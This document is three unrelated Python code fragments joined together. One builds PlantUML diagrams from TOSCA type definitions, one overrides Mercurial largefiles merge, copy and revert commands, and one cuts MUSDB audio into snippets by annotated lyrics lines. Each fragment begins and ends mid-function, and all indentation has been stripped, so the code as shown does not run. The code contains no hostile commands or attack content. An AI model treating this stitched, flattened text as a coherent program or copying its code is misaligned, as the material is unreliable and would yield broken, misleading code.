declaration = declaration + "<b>"
declaration = declaration + field_name
field_type = syntax.get_type(field_yaml)
if field_type:
declaration = declaration + " : " + field_type
if field_type in ["list", "map"]:
entry_schema_type = get_entry_schema_type(field_yaml)
if entry_schema_type is None:
entry_schema_type = "?"
declaration = declaration + "<" + entry_schema_type + ">"
field_default = syntax.get_default(field_yaml)
if field_default:
declaration = declaration + " = " + str(field_default)
self.generate(declaration)
def translateToscaOccurrences2UmlMultiplicity(occurrences):
lower_bound = occurrences[0]
upper_bound = occurrences[1]
if lower_bound == upper_bound:
return str(lower_bound)
if upper_bound == syntax.UNBOUNDED:
upper_bound = "*"
return str(lower_bound) + ".." + str(upper_bound)
derived_from = syntax.get_derived_from(type_yaml)
if derived_from:
if types.get(derived_from) is None:
self.generate(
'class "',
derived_from,
'" << (',
class_kind,
",green) >> #DDDDDD",
sep="",
)
self.generate('"', derived_from, '" <|-- "', class_name, '"', sep="")
self.generate(
'class "', class_name, '" << (', class_kind, ",green) >> {", sep=""
)
mime_type = type_yaml.get(MIME_TYPE)
if mime_type:
self.generate("+mime_type:", mime_type)
file_ext = type_yaml.get(FILE_EXT)
if file_ext:
self.generate("+file_ext:", file_ext)
attributes = get_dict(type_yaml, ATTRIBUTES)
if len(attributes):
self.generate(".. attributes ..")
for attribute_name, attribute_yaml in attributes.items():
generate_field(attribute_name, attribute_yaml)
properties = get_dict(type_yaml, PROPERTIES)
if len(properties):
self.generate(".. properties ..")
for property_name, property_yaml in properties.items():
generate_field(property_name, property_yaml)
capabilities = syntax.get_capabilities(type_yaml)
if len(capabilities):
self.generate(".. capabilities ..")
for capability_name, capability_yaml in capabilities.items():
self.generate("+", capability_name, sep="")
capability_type = get_capability_type(capability_yaml)
if capability_type:
capability_occurrence = (
translateToscaOccurrences2UmlMultiplicity(
get_capability_occurrences(capability_yaml)
)
)
self.generate(
" type : ",
capability_type,
"[",
capability_occurrence,
"]",
sep="",
)
if isinstance(capability_yaml, dict):
capability_valid_source_types = capability_yaml.get(
VALID_SOURCE_TYPES
)
if capability_valid_source_types:
self.generate(
" valid_source_types : ",
capability_valid_source_types,
sep="",
)
requirements = get_dict(type_yaml, REQUIREMENTS)
if len(requirements):
self.generate(".. requirements ..")
for requirement_name, requirement_yaml in requirements.items():
requirement_occurrences = syntax.get_requirement_occurrences(
requirement_yaml
)
if requirement_occurrences[0] > 0:
bold = "<b>"
else:
bold = ""
self.generate("+", bold, requirement_name, sep="")
requirement_capability_type = syntax.get_requirement_capability(
requirement_yaml
)
if requirement_capability_type:
uml_multiplicity = translateToscaOccurrences2UmlMultiplicity(
requirement_occurrences
)
self.generate(
" capability : ",
requirement_capability_type,
"[",
uml_multiplicity,
"]",
sep="",
)
requirement_relationship = syntax.get_requirement_relationship(
requirement_yaml
)
requirement_relationship_type = syntax.get_relationship_type(
requirement_relationship
)
if requirement_relationship_type:
self.generate(" relationship :", requirement_relationship_type)
requirement_node = syntax.get_requirement_node_type(
requirement_yaml
)
if requirement_node:
self.generate(" node :", requirement_node)
interfaces = get_dict(type_yaml, INTERFACES)
if len(interfaces):
self.generate("--")
for interface_name, interface_yaml in interfaces.items():
self.generate(".. interface", interface_name, "..")
for key, value in (
syntax.get_operations(interface_yaml).get(OPERATIONS).items()
):
self.generate("+", key, "()", sep="")
if class_kind == "I":
for key, value in (
syntax.get_operations(type_yaml).get(OPERATIONS).items()
):
self.generate("+", key, "()", sep="")
self.generate("}")
for attribute_name, attribute_yaml in attributes.items():
attribute_type = attribute_yaml.get(TYPE)
if data_types.get(attribute_type):
self.generate(
'"',
class_name,
'" *-- "1" "',
attribute_type,
'" : ',
attribute_name,
sep="",
)
if attribute_type in ["list", "map"]:
entry_schema_type = get_entry_schema_type(attribute_yaml)
if data_types.get(entry_schema_type):
self.generate(
'"',
class_name,
'" *-- "*" "',
entry_schema_type,
'" : ',
attribute_name,
sep="",
)
for property_name, property_yaml in properties.items():
property_type = syntax.get_property_type(property_yaml)
if data_types.get(property_type):
self.generate(
'"',
class_name,
'" *-- "1" "',
property_type,
'" : ',
property_name,
sep="",
)
if property_type in ["list", "map"]:
entry_schema_type = get_entry_schema_type(property_yaml)
if data_types.get(entry_schema_type):
self.generate(
'"',
class_name,
'" *-- "*" "',
entry_schema_type,
'" : ',
property_name,
sep="",
)
for capability_name, capability_yaml in capabilities.items():
capability_type = get_capability_type(capability_yaml)
if capability_type:
if capability_types.get(capability_type) is None:
self.generate(
'class "',
capability_type,
'" << (C,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
capability_type,
'" "',
translateToscaOccurrences2UmlMultiplicity(
get_capability_occurrences(capability_yaml)
),
'" -* "',
class_name,
'" : ',
capability_name,
sep="",
)
if isinstance(capability_yaml, dict):
capability_valid_source_types = capability_yaml.get(
VALID_SOURCE_TYPES
)
if capability_valid_source_types:
for (
capability_valid_source_type
) in capability_valid_source_types:
if node_types.get(capability_valid_source_type) is None:
self.generate(
'class "',
capability_valid_source_type,
'" << (N,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
capability_valid_source_type,
'" <.. "',
class_name,
'" : ',
capability_name,
".valid_source_types",
sep="",
)
for requirement_name, requirement_yaml in requirements.items():
requirement_capability_type = syntax.get_requirement_capability(
requirement_yaml
)
if requirement_capability_type:
if capability_types.get(requirement_capability_type) is None:
self.generate(
'class "',
requirement_capability_type,
'" << (C,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
class_name,
'" *- "',
translateToscaOccurrences2UmlMultiplicity(
get_requirement_occurrences(requirement_yaml)
),
'" "',
requirement_capability_type,
'" : ',
requirement_name,
sep="",
)
requirement_relationship = syntax.get_requirement_relationship(
requirement_yaml
)
requirement_relationship_type = syntax.get_relationship_type(
requirement_relationship
)
if requirement_relationship_type:
if relationship_types.get(requirement_relationship_type) is None:
self.generate(
'class "',
requirement_relationship_type,
'" << (R,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
class_name,
'" ..> "',
requirement_relationship_type,
'" : ',
requirement_name,
".relationship",
sep="",
)
requirement_node = syntax.get_requirement_node_type(requirement_yaml)
if requirement_node:
if node_types.get(requirement_node) is None:
self.generate(
'class "',
requirement_node,
'" << (N,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
class_name,
'" ..> "',
requirement_node,
'" : ',
requirement_name,
".node",
sep="",
)
for interface_name, interface_yaml in interfaces.items():
interface_type = interface_yaml.get(TYPE)
if interface_type:
if interface_types.get(interface_type) is None:
self.generate(
'class "',
interface_type,
'" << (I,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
interface_type,
'" <|.. "',
class_name,
'" : ',
interface_name,
sep="",
)
valid_target_types = type_yaml.get(VALID_TARGET_TYPES)
if valid_target_types:
for valid_target_type in valid_target_types:
self.generate(
'"',
class_name,
'" ..> "',
valid_target_type,
'" : valid_target_types',
sep="",
)
members = type_yaml.get(MEMBERS)
if members:
for member in members:
if node_types.get(member) is None:
self.generate(
'class "', member, '" << (N,green) >> #DDDDDD', sep=""
)
self.generate(
'"', class_name, '" ..> "*" "', member, '" : members', sep=""
)
targets = type_yaml.get(TARGETS)
if targets:
for target in targets:
if (
node_types.get(target) is None
and group_types.get(target) is None
):
if "nodes." in target:
stereotype = "N"
elif "groups." in target:
stereotype = "G"
else:
stereotype = "X"
self.generate(
'class "',
target,
'" << (',
stereotype,
",green) >> #DDDDDD",
sep="",
)
self.generate(
'"', class_name, '" ..> "*" "', target, '" : targets', sep=""
)
def generate_classes(type_kind, class_kind, types):
# self.generate('package', type_kind, '{')
for type_name, type_yaml in types.items():
generate_class(type_name, class_kind, type_yaml, types)
# self.generate('}')
# Generate the UML class associated to each type.
generate_classes("data_types", "D", data_types)
generate_classes("artifact_types", "A", artifact_types)
generate_classes("capability_types", "C", capability_types)
generate_classes("relationship_types", "R", relationship_types)
generate_classes("interface_types", "I", interface_types)
generate_classes("node_types", "N", node_types)
generate_classes("group_types", "G", group_types)
generate_classes("policy_types", "P", policy_types)
self.generate("@enduml")
self.close_file()
def generate_UML2_component_diagram(self, topology_template, with_relationships):
self.generate("@startuml")
self.generate("skinparam componentStyle uml2")
if with_relationships:
self.generate("skinparam component {")
self.generate(" backgroundColor<<relationship>> White")
self.generate("}")
self.generate()
substitution_mappings = topology_template.get(SUBSTITUTION_MAPPINGS)
if substitution_mappings:
substitution_mappings_uml_id = SUBSTITUTION_MAPPINGS
substitution_mappings_node_type = substitution_mappings.get(NODE_TYPE)
merged_substitution_mappings_type = self.type_system.merge_node_type(
substitution_mappings_node_type
)
for capability_name, capability_yaml in get_dict(
merged_substitution_mappings_type, CAPABILITIES
).items():
capability_uml_id = (
substitution_mappings_uml_id + "_" + normalize_name(capability_name)
)
# Declare an UML interface for the substitution_mappings capability.
self.generate(
'interface "', capability_name, '" as ', capability_uml_id, sep=""
)
self.generate(
'component ": ',
substitution_mappings_node_type,
'" <<node>> as ',
substitution_mappings_uml_id,
" {",
sep="",
)
relationship_templates = get_dict(topology_template, RELATIONSHIP_TEMPLATES)
already_generated_interfaces = {}
# Iterate over all node templates.
| |
largefiles. This makes the merge proceed and we can then handle this
# case further in the overridden manifestmerge function below.
def overridecheckunknownfile(origfn, repo, wctx, mctx, f):
if lfutil.standin(repo.dirstate.normalize(f)) in wctx:
return False
return origfn(repo, wctx, mctx, f)
# The manifest merge handles conflicts on the manifest level. We want
# to handle changes in largefile-ness of files at this level too.
#
# The strategy is to run the original manifestmerge and then process
# the action list it outputs. There are two cases we need to deal with:
#
# 1. Normal file in p1, largefile in p2. Here the largefile is
# detected via its standin file, which will enter the working copy
# with a "get" action. It is not "merge" since the standin is all
# Mercurial is concerned with at this level -- the link to the
# existing normal file is not relevant here.
#
# 2. Largefile in p1, normal file in p2. Here we get a "merge" action
# since the largefile will be present in the working copy and
# different from the normal file in p2. Mercurial therefore
# triggers a merge action.
#
# In both cases, we prompt the user and emit new actions to either
# remove the standin (if the normal file was kept) or to remove the
# normal file and get the standin (if the largefile was kept). The
# default prompt answer is to use the largefile version since it was
# presumably changed on purpose.
#
# Finally, the merge.applyupdates function will then take care of
# writing the files into the working copy and lfcommands.updatelfiles
# will update the largefiles.
def overridemanifestmerge(origfn, repo, p1, p2, pa, branchmerge, force,
partial, acceptremote=False):
overwrite = force and not branchmerge
actions = origfn(repo, p1, p2, pa, branchmerge, force, partial,
acceptremote)
processed = []
for action in actions:
if overwrite:
processed.append(action)
continue
f, m, args, msg = action
choices = (_('&Largefile'), _('&Normal file'))
splitstandin = lfutil.splitstandin(f)
if (m == "g" and splitstandin is not None and
splitstandin in p1 and f in p2):
# Case 1: normal file in the working copy, largefile in
# the second parent
lfile = splitstandin
standin = f
msg = _('%s has been turned into a largefile\n'
'use (l)argefile or keep as (n)ormal file?') % lfile
if repo.ui.promptchoice(msg, choices, 0) == 0:
processed.append((lfile, "r", None, msg))
processed.append((standin, "g", (p2.flags(standin),), msg))
else:
processed.append((standin, "r", None, msg))
elif m == "g" and lfutil.standin(f) in p1 and f in p2:
# Case 2: largefile in the working copy, normal file in
# the second parent
standin = lfutil.standin(f)
lfile = f
msg = _('%s has been turned into a normal file\n'
'keep as (l)argefile or use (n)ormal file?') % lfile
if repo.ui.promptchoice(msg, choices, 0) == 0:
processed.append((lfile, "r", None, msg))
else:
processed.append((standin, "r", None, msg))
processed.append((lfile, "g", (p2.flags(lfile),), msg))
else:
processed.append(action)
return processed
# Override filemerge to prompt the user about how they wish to merge
# largefiles. This will handle identical edits, and copy/rename +
# edit without prompting the user.
def overridefilemerge(origfn, repo, mynode, orig, fcd, fco, fca):
# Use better variable names here. Because this is a wrapper we cannot
# change the variable names in the function declaration.
fcdest, fcother, fcancestor = fcd, fco, fca
if not lfutil.isstandin(orig):
return origfn(repo, mynode, orig, fcdest, fcother, fcancestor)
else:
if not fcother.cmp(fcdest): # files identical?
return None
# backwards, use working dir parent as ancestor
if fcancestor == fcother:
fcancestor = fcdest.parents()[0]
if orig != fcother.path():
repo.ui.status(_('merging %s and %s to %s\n')
% (lfutil.splitstandin(orig),
lfutil.splitstandin(fcother.path()),
lfutil.splitstandin(fcdest.path())))
else:
repo.ui.status(_('merging %s\n')
% lfutil.splitstandin(fcdest.path()))
if fcancestor.path() != fcother.path() and fcother.data() == \
fcancestor.data():
return 0
if fcancestor.path() != fcdest.path() and fcdest.data() == \
fcancestor.data():
repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
return 0
if repo.ui.promptchoice(_('largefile %s has a merge conflict\n'
'keep (l)ocal or take (o)ther?') %
lfutil.splitstandin(orig),
(_('&Local'), _('&Other')), 0) == 0:
return 0
else:
repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
return 0
# Copy first changes the matchers to match standins instead of
# largefiles. Then it overrides util.copyfile in that function it
# checks if the destination largefile already exists. It also keeps a
# list of copied files so that the largefiles can be copied and the
# dirstate updated.
def overridecopy(orig, ui, repo, pats, opts, rename=False):
# doesn't remove largefile on rename
if len(pats) < 2:
# this isn't legal, let the original function deal with it
return orig(ui, repo, pats, opts, rename)
def makestandin(relpath):
path = scmutil.canonpath(repo.root, repo.getcwd(), relpath)
return os.path.join(repo.wjoin(lfutil.standin(path)))
fullpats = scmutil.expandpats(pats)
dest = fullpats[-1]
if os.path.isdir(dest):
if not os.path.isdir(makestandin(dest)):
os.makedirs(makestandin(dest))
# This could copy both lfiles and normal files in one command,
# but we don't want to do that. First replace their matcher to
# only match normal files and run it, then replace it to just
# match largefiles and run it again.
nonormalfiles = False
nolfiles = False
try:
try:
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, pats, opts, rename)
except util.Abort, e:
if str(e) != _('no files to copy'):
raise e
else:
nonormalfiles = True
result = 0
finally:
restorematchfn()
# The first rename can cause our current working directory to be removed.
# In that case there is nothing left to copy/rename so just quit.
try:
repo.getcwd()
except OSError:
return result
try:
try:
# When we call orig below it creates the standins but we don't add
# them to the dir state until later so lock during that time.
wlock = repo.wlock()
manifest = repo[None].manifest()
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
newpats = []
# The patterns were previously mangled to add the standin
# directory; we need to remove that now
for pat in pats:
if match_.patkind(pat) is None and lfutil.shortname in pat:
newpats.append(pat.replace(lfutil.shortname, ''))
else:
newpats.append(pat)
match = oldmatch(ctx, newpats, opts, globbed, default)
m = copy.copy(match)
lfile = lambda f: lfutil.standin(f) in manifest
m._files = [lfutil.standin(f) for f in m._files if lfile(f)]
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
m.matchfn = lambda f: (lfutil.isstandin(f) and
(f in manifest) and
origmatchfn(lfutil.splitstandin(f)) or
None)
return m
oldmatch = installmatchfn(overridematch)
listpats = []
for pat in pats:
if match_.patkind(pat) is not None:
listpats.append(pat)
else:
listpats.append(makestandin(pat))
try:
origcopyfile = util.copyfile
copiedfiles = []
def overridecopyfile(src, dest):
if (lfutil.shortname in src and
dest.startswith(repo.wjoin(lfutil.shortname))):
destlfile = dest.replace(lfutil.shortname, '')
if not opts['force'] and os.path.exists(destlfile):
raise IOError('',
_('destination largefile already exists'))
copiedfiles.append((src, dest))
origcopyfile(src, dest)
util.copyfile = overridecopyfile
result += orig(ui, repo, listpats, opts, rename)
finally:
util.copyfile = origcopyfile
lfdirstate = lfutil.openlfdirstate(ui, repo)
for (src, dest) in copiedfiles:
if (lfutil.shortname in src and
dest.startswith(repo.wjoin(lfutil.shortname))):
srclfile = src.replace(repo.wjoin(lfutil.standin('')), '')
destlfile = dest.replace(repo.wjoin(lfutil.standin('')), '')
destlfiledir = os.path.dirname(repo.wjoin(destlfile)) or '.'
if not os.path.isdir(destlfiledir):
os.makedirs(destlfiledir)
if rename:
os.rename(repo.wjoin(srclfile), repo.wjoin(destlfile))
lfdirstate.remove(srclfile)
else:
util.copyfile(repo.wjoin(srclfile),
repo.wjoin(destlfile))
lfdirstate.add(destlfile)
lfdirstate.write()
except util.Abort, e:
if str(e) != _('no files to copy'):
raise e
else:
nolfiles = True
finally:
restorematchfn()
wlock.release()
if nolfiles and nonormalfiles:
raise util.Abort(_('no files to copy'))
return result
# When the user calls revert, we have to be careful to not revert any
# changes to other largefiles accidentally. This means we have to keep
# track of the largefiles that are being reverted so we only pull down
# the necessary largefiles.
#
# Standins are only updated (to match the hash of largefiles) before
# commits. Update the standins then run the original revert, changing
# the matcher to hit standins instead of largefiles. Based on the
# resulting standins update the largefiles. Then return the standins
# to their proper state
def overriderevert(orig, ui, repo, *pats, **opts):
# Because we put the standins in a bad state (by updating them)
# and then return them to a correct state we need to lock to
# prevent others from changing them in their incorrect state.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
(modified, added, removed, missing, unknown, ignored, clean) = \
lfutil.lfdirstatestatus(lfdirstate, repo, repo['.'].rev())
lfdirstate.write()
for lfile in modified:
lfutil.updatestandin(repo, lfutil.standin(lfile))
for lfile in missing:
if (os.path.exists(repo.wjoin(lfutil.standin(lfile)))):
os.unlink(repo.wjoin(lfutil.standin(lfile)))
try:
ctx = scmutil.revsingle(repo, opts.get('rev'))
oldmatch = None # for the closure
| |
<filename>03_preprocessing_musdb_audio_txt_char.py
"""
This script reads the MUSDB lyrics annotation files, cuts the audio
into snippets according to annotated lines, and
saves audio and text files accordingly (both as torch files).
Please note that when this file was written,
the vocals category annotations were done with different
letters than in the publicly available version of the MUSDB lyrics.
The categories translate as follows: a-->n, b-->s, c-->d, d-->x (public format --> old format).
This script can be used with the a, b, c, d annotation style but the
annotations will be translated to the old format and the folder
structure and other scripts use the old format as well.
"""
import musdb
import librosa as lb
import torch
import os
import pickle
import yaml
# ignore warning about unsafe loaders in pyYAML 5.1 (used in musdb)
# https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation
yaml.warnings({'YAMLLoadWarning': False})
path_to_musdb = '../Datasets/MUSDB18'
path_to_train_lyrics = '../Datasets/MUSDB_w_lyrics/lyrics_transcripts/train'
path_to_test_lyrics = '../Datasets/MUSDB_w_lyrics/lyrics_transcripts/test'
pickle_in = open('dicts/char2idx.pickle', 'rb')
char2idx = pickle.load(pickle_in)
target_sr = 16000
path_to_save_data = '../Datasets/MUSDB_w_lyrics'
# ------------------------------------------------------------------------------------------------------------------
# make folder structure
path = os.path.join(path_to_save_data, 'test', 'text')
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
for stem in ['vocals', 'mix', 'accompaniments']:
for type in ['n', 'x', 's', 'd']:
path = os.path.join(path_to_save_data, 'test', 'audio', stem, type)
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
path = os.path.join(path_to_save_data, 'val', 'text')
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
for stem in ['vocals', 'mix']:
for type in ['n', 'x', 's', 'd']:
path = os.path.join(path_to_save_data, 'val', 'audio', stem, type)
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
path = os.path.join(path_to_save_data, 'train', 'text')
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
for stem in ['vocals', 'accompaniment', 'drums', 'bass', 'other']:
for type in ['n', 'x', 's', 'd']:
path = os.path.join(path_to_save_data, 'train', 'audio', stem, type)
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
os.makedirs(os.path.join(path_to_save_data, 'train', 'audio', 'drums_12s'), exist_ok=True)
os.makedirs(os.path.join(path_to_save_data, 'train', 'audio', 'bass_12s'), exist_ok=True)
os.makedirs(os.path.join(path_to_save_data, 'train', 'audio', 'other_12s'), exist_ok=True)
os.makedirs(os.path.join(path_to_save_data, 'train', 'audio', 'accompaniment_12s'), exist_ok=True)
# ------------------------------------------------------------------------------------------------------------------
musdb_corpus = musdb.DB(path_to_musdb)
training_tracks = musdb_corpus.load_mus_tracks(subsets=['train'])
test_tracks = musdb_corpus.load_mus_tracks(subsets=['test'])
# validation set as open unmix but replace non english tracks by another track from the same artist:
# replaced Fergessen - Nos Palpitants by Fergessen - The Wind
# relplaced Meaxic - Take A Step by Meaxic - You Listen
validation_tracks = ['Actions - One Minute Smile',
'<NAME> - Waltz For My Victims',
'<NAME> - Promises & Lies',
'<NAME> - A Reason To Leave',
'Triviul - Angelsaint',
'<NAME> - Goodbye Bolero',
'Fergessen - The Wind',
'Leaf - Summerghost',
'Skelpolu - Human Mistakes',
'<NAME> - Pennies',
'ANiMAL - Rockshow',
'<NAME> - On The Line',
'Meaxic - You Listen',
'Traffic Experiment - Sirens']
# -----------------------------------------------------------------------------------------------------------------
# process MUSDB training partition and make training and validation files
train_files_n = []
train_files_s = []
train_files_d = []
train_files_x = []
val_files_n = []
val_files_s = []
val_files_d = []
val_files_x = []
train_accompaniment_12s = []
train_bass_12s = []
train_drums_12s = []
train_other_12s = []
snippet_type_conversion = {'a': 'n', 'b': 's', 'c': 'd', 'd': 'x'}
for track in training_tracks:
track_name = track.name
# make file name for audio and text files of current track
file_name = track.name.split('-')
file_name = file_name[0][0:6] + "_" + file_name[1][1:6]
file_name = file_name.replace(" ", "_")
# make boolean indicating whether current track is in validation set
val_set_track = track_name in validation_tracks
# -----------------------------------------------------------------------------------------------------------------
# generate accompaniment snippets of 12 s length of all tracks in training partition
if not val_set_track:
for target in ['accompaniment', 'drums', 'bass', 'other']:
accompaniment_audio = track.targets[target].audio
accompaniment_audio_resampled = lb.core.resample(accompaniment_audio.T, track.rate, target_sr)
acc_snippets = lb.util.frame(accompaniment_audio_resampled, frame_length=12 * target_sr,
hop_length=12 * target_sr)
number_of_snippets = acc_snippets.shape[-1]
for counter in range(number_of_snippets):
# audio_torch has shape (2, ???) = (channels, samples)
audio_torch = torch.tensor(acc_snippets[:, :, counter]).type(torch.float32)
torch.save(audio_torch, os.path.join(path_to_save_data, 'train', 'audio', '{}_12s'.format(target),
file_name + '_{}.pt'.format(counter)))
if target == 'accompaniment':
train_accompaniment_12s.append(file_name + '_{}.pt'.format(counter))
elif target == 'drums':
train_drums_12s.append(file_name + '_{}.pt'.format(counter))
elif target == 'bass':
train_bass_12s.append(file_name + '_{}.pt'.format(counter))
elif target == 'other':
train_other_12s.append(file_name + '_{}.pt'.format(counter))
# -----------------------------------------------------------------------------------------------------------------
path_to_track_lyrics = os.path.join(path_to_train_lyrics, track_name + '.txt')
# ignore files without lyrics annotations
if not os.path.isfile(path_to_track_lyrics):
print("No lyrics for", track, ", it was skipped")
continue
lyrics_file = open(path_to_track_lyrics)
lyrics_lines = lyrics_file.readlines()
vocals_audio = track.targets['vocals'].audio
if val_set_track:
other_audio = track.audio
# resample
acc_audio_resampled = lb.core.resample(other_audio.T, track.rate, target_sr)
vocals_audio_resampled = lb.core.resample(vocals_audio.T, track.rate, target_sr)
# go through lyrics lines and split audio as annotated
for counter, line in enumerate(lyrics_lines):
# ignore rejected lines
if line[0] == '*':
continue
annotations = line.split(' ', maxsplit=3)
start_m = int(annotations[0].split(':')[0]) # start time minutes
start_s = int(annotations[0].split(':')[1]) # start time seconds
start_time = start_m * 60 + start_s # start time in seconds
end_m = int(annotations[1].split(':')[0]) # end time minutes
end_s = int(annotations[1].split(':')[1]) # end time seconds
end_time = end_m * 60 + end_s # end time in seconds
acc_audio_snippet = acc_audio_resampled[:, start_time * target_sr: end_time * target_sr]
vocals_audio_snippet = vocals_audio_resampled[:, start_time * target_sr: end_time * target_sr]
acc_audio_snippet_torch = torch.tensor(acc_audio_snippet).type(torch.float32)
vocals_audio_snippet_torch = torch.tensor(vocals_audio_snippet).type(torch.float32)
snippet_type = annotations[2] # a, b, c, d
snippet_type = snippet_type_conversion[snippet_type] # change to old format n, s, d, x
text = annotations[3].replace('\n', '').replace(' ', '>')
text_idx = torch.tensor([char2idx[char] for char in text]).type(torch.float32)
snippet_file_name = file_name + '_{}'.format(counter)
partition = 'val'
other = 'mix'
# save audio
path_to_save_vocals = os.path.join(path_to_save_data, partition, 'audio', 'vocals', snippet_type,
snippet_file_name)
path_to_save_other = os.path.join(path_to_save_data, partition, 'audio', other, snippet_type,
snippet_file_name)
torch.save(acc_audio_snippet_torch, path_to_save_other + '.pt')
torch.save(vocals_audio_snippet_torch, path_to_save_vocals + '.pt')
# save text
path_to_save_text = os.path.join(path_to_save_data, partition, 'text', snippet_file_name + '.txt')
path_to_save_text_idx = os.path.join(path_to_save_data, partition, 'text', snippet_file_name + '.pt')
with open(path_to_save_text, 'w') as txt_file:
txt_file.write(text)
txt_file.close()
torch.save(text_idx, path_to_save_text_idx)
if snippet_type == 'n':
val_files_n.append('n/{}'.format(snippet_file_name))
if snippet_type == 'x':
val_files_x.append('x/{}'.format(snippet_file_name))
if snippet_type == 's':
val_files_s.append('s/{}'.format(snippet_file_name))
if snippet_type == 'd':
val_files_d.append('d/{}'.format(snippet_file_name))
# process training songs
else:
acc_audio = track.targets['accompaniment'].audio
drums_audio = track.targets['drums'].audio
bass_audio = track.targets['bass'].audio
other_audio = track.targets['other'].audio
# resample
vocals_audio_resampled = lb.core.resample(vocals_audio.T, track.rate, target_sr)
acc_audio_resampled = lb.core.resample(acc_audio.T, track.rate, target_sr)
drums_audio_resampled = lb.core.resample(drums_audio.T, track.rate, target_sr)
bass_audio_resampled = lb.core.resample(bass_audio.T, track.rate, target_sr)
other_audio_resampled = lb.core.resample(other_audio.T, track.rate, target_sr)
# go through lyrics lines and split audio as annotated
for counter, line in enumerate(lyrics_lines):
# ignore rejected lines
if line[0] == '*':
continue
annotations = line.split(' ', maxsplit=3)
start_m = int(annotations[0].split(':')[0]) # start time minutes
start_s = int(annotations[0].split(':')[1]) # start time seconds
start_time = start_m * 60 + start_s # start time in seconds
end_m = int(annotations[1].split(':')[0]) # end time minutes
end_s = int(annotations[1].split(':')[1]) # end time seconds
end_time = end_m * 60 + end_s # end time in seconds
acc_audio_snippet = acc_audio_resampled[:, start_time * target_sr: end_time * target_sr]
vocals_audio_snippet = vocals_audio_resampled[:, start_time * target_sr: end_time * target_sr]
drums_audio_snippet = drums_audio_resampled[:, start_time * target_sr: end_time * target_sr]
bass_audio_snippet = bass_audio_resampled[:, start_time * target_sr: end_time * target_sr]
other_audio_snippet = other_audio_resampled[:, start_time * target_sr: end_time * target_sr]
acc_audio_snippet_torch = torch.tensor(acc_audio_snippet).type(torch.float32)
vocals_audio_snippet_torch = torch.tensor(vocals_audio_snippet).type(torch.float32)
drums_audio_snippet_torch = torch.tensor(drums_audio_snippet).type(torch.float32)
bass_audio_snippet_torch = torch.tensor(bass_audio_snippet).type(torch.float32)
other_audio_snippet_torch = torch.tensor(other_audio_snippet).type(torch.float32)
snippet_type = annotations[2] # a, b, c, d
snippet_type = snippet_type_conversion[snippet_type] # change to old format n, s, d, x
text = annotations[3].replace('\n', '').replace(' ', '>')
text_idx = torch.tensor([char2idx[char] for char in text]).type(torch.float32)
snippet_file_name = file_name + '_{}'.format(counter)
partition = 'train'
other = 'accompaniments'
# save audio
path_to_save_vocals = os.path.join(path_to_save_data, partition, 'audio', 'vocals', snippet_type,
snippet_file_name)
path_to_save_acc = os.path.join(path_to_save_data, partition, 'audio', 'accompaniment', snippet_type,
snippet_file_name)
path_to_save_drums = os.path.join(path_to_save_data, partition, 'audio', 'drums', snippet_type,
snippet_file_name)
path_to_save_bass = os.path.join(path_to_save_data, partition, 'audio', 'bass', snippet_type,
snippet_file_name)
path_to_save_other = os.path.join(path_to_save_data, partition, 'audio', 'other', snippet_type,
snippet_file_name)
torch.save(acc_audio_snippet_torch, path_to_save_acc + '.pt')
torch.save(vocals_audio_snippet_torch, path_to_save_vocals + '.pt')
torch.save(drums_audio_snippet_torch, path_to_save_drums + '.pt')
torch.save(bass_audio_snippet_torch, path_to_save_bass + '.pt')
torch.save(other_audio_snippet_torch, path_to_save_other + '.pt')
# save text
path_to_save_text = os.path.join(path_to_save_data, partition, 'text', snippet_file_name + '.txt')
path_to_save_text_idx = os.path.join(path_to_save_data, partition, 'text', snippet_file_name + '.pt')
with open(path_to_save_text, 'w') as txt_file:
txt_file.write(text)
txt_file.close()
torch.save(text_idx, path_to_save_text_idx)
if snippet_type == 'n':
train_files_n.append('n/{}'.format(snippet_file_name))
if snippet_type == 'x':
train_files_x.append('x/{}'.format(snippet_file_name))
if snippet_type == 's':
train_files_s.append('s/{}'.format(snippet_file_name))
if snippet_type == 'd':
train_files_d.append('d/{}'.format(snippet_file_name))
# # save lists with file names
pickle_out = open(os.path.join(path_to_save_data, "val", "val_files_n.pickle"), "wb")
pickle.dump(val_files_n, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "val", "val_files_x.pickle"), "wb")
pickle.dump(val_files_x, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "val", "val_files_s.pickle"), "wb")
pickle.dump(val_files_s, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "val", "val_files_d.pickle"), "wb")
pickle.dump(val_files_d, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_files_n.pickle"), "wb")
pickle.dump(train_files_n, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_files_x.pickle"), "wb")
pickle.dump(train_files_x, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_files_s.pickle"), "wb")
pickle.dump(train_files_s, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_files_d.pickle"), "wb")
pickle.dump(train_files_d, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_accompaniments_12s.pickle"), "wb")
pickle.dump(train_accompaniment_12s, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_drums_12s.pickle"), "wb")
pickle.dump(train_drums_12s, pickle_out)
pickle_out.close()
